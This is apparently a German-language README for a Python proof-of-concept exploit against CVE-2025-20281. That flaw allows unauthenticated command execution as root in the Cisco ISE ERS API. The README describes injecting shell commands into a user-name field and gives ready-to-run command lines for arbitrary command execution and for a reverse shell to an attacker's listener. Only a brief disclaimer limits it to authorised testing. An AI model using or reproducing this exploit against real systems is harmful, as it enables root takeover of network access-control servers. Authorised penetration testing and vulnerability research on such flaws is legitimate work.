
Exploit für die nicht authentifizierte Remote-Codeausführung (CVE-2025-20281) in der Cisco ISE ERS API. Führen Sie Befehle aus oder starten Sie Reverse Shells als Root – keine Authentifizierung erforderlich.
Dieses Repository enthält einen Python-3-Proof-of-Concept-Exploit für CVE-2025-20281, eine kritische Schwachstelle in Cisco Identity Services Engine (ISE), die nicht authentifizierte Remote-Codeausführung (RCE) als Root über die ERS API ermöglicht.
Der Cisco ISE ERS-Endpunkt
/ers/sdk#_validiert die Authentifizierung bei der Verarbeitung von Benutzererstellungsanfragen nicht.
Durch das Einschleusen von Shell-Befehlen in den ParameternamedesInternalUser-Objekts können Angreifer eine Befehlsausführung als Root erreichen.
--cmd)--whoami--reverse)python3 CVE-2025-20281.py TARGET [--whoami | --cmd "id" | --reverse LHOST LPORT]
Testbefehl:
python3 CVE-2025-20281.py 192.168.1.10 --whoami
Benutzerdefinierten Befehl ausführen:
python3 CVE-2025-20281.py 192.168.1.10 --cmd "id && hostname"
Reverse-Shell:
python3 CVE-2025-20281.py 192.168.1.10 --reverse 10.10.14.99 4444
⚠️ Rechtlicher Hinweis
Dieser Code dient ausschließlich zu Bildungs- und autorisierten Testzwecken. Verwenden Sie diese Software nicht gegen Netzwerke oder Systeme, die Ihnen nicht gehören oder für die Sie keine Testberechtigung haben.
Schwachstelle: Über Cisco Advisory offengelegt
PoC-Überarbeitung: illdeed